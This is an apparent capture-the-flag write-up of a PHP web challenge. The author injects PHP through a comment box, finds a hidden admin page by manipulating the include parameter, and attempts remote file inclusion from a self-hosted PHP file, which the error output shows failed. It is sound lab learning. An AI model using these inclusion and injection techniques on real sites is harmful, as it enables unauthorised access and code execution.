This challenge has 3 flags, and I've managed to get 2 of them so far:
The "blog post" indicates that the site is powered by php. So what happens if we just include some php in the comment input box?
<?php echo '<p>Hello World</p>'; ?>
Looking at the page source shows a commented out anchor:
<h3>Comments</h3> <!--<a href="?page=admin.auth.inc">Admin login</a>-->
Loading that path brings up an admin log in page. No flag yet, but what if we try just
admin.inc? Second flag! And we can approve comments, that's handy!
What are we going to do for the final flag? SQL injection on the login page? XSS in a comment? Maybe we can upload a file and include it? If we can include a remote PHP file maybe we could host it ourselves and inject some code for the target to execute.
Notice: Undefined variable: title in /app/index.php on line 30
Warning: include(http://4d4ms.com/lee.php): failed to open stream: Connection refused in /app/index.php on line 21
Warning: include(): Failed opening 'http://4d4ms.com/lee.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /app/index.php on line 21